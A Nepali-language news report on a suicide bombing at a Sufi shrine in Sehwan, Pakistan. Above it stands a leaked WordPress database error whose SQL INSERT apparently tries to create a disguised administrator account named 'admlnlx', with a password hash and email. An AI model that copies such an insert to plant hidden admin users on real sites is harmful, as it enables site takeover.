WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BMJgiJ4o5sWLgrSBMIbiD2sgrPelVv.', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-01-07 05:09:22', '', 'admlnlx', 'admlnlx')
इस्लामाबाद, फागुन ५-
पाकिस्तानमा गत चार दिनको अवधिमा सात ओटा विस्फोटनका घटना भएका छन् । ती विस्फोटनहरुमा परी कम्तीमा १०१ जनाको मृत्यु भएको छ भने अरु ३०० जना भन्दा बढी घाइते भएका छन् ।
यसक्रममा पछिल्लो पटक बिहीबार बेलुका अर्को शक्तिशाली आत्मघाती बम आक्रमण भएको छ ।
पाकिस्तानको सिन्ध प्रान्तस्थित सूफी समाधिस्थलमा गरिएको सो आक्रमणमा परी कम्तीमा ७२ जनाको मृत्यु भएको छ । घटनामा अन्य २०० जना अन्य घाइते भएका प्रहरी अधिकारीहरुले जनाएका छन् ।
पाकिस्तानको जम्सोरो जिल्लामा पर्ने सेहवान सरहमा अवस्थित सन्तलाल शाहबाज कालन्दरको समाधिस्थलमा आक्रमण गरिएको थियो । प्रहरी उच्च अधिकारीहरुले युवा आत्मघाती बम आक्रमणकारीहरुले गराएको यो विस्फोट यस बर्षकै सवै भन्दा बढी दु्खदायी भएको बताएका छन् । उद्धार टोलीका प्रमुख फैसल इदीले घटनामा मृत्यु हुने मध्ये ४३ जना पुरुष, २० जना बालबालिका र ९ जना महिला रहेका जानकारी दिनुभयो । केही घाइतेहरुको अवस्था चिन्ताजनक रहेकाले मृतकहरुको संख्या थप बढ्न सक्ने उहाँले बताउनु भयो ।
सेहवान र छिमेकी सहरहरुमा सङ्कटकालको घोषणा गरी घाइतेहरुको विभिन्न अस्पतालहरुमा उपचार भईरहेको छ । गम्भिर घाइतेहरुलाई थप उपचारका लागि विमानबाट कराँची लगिएको अधिकारीहरुले जनाएका छन् ।- रासस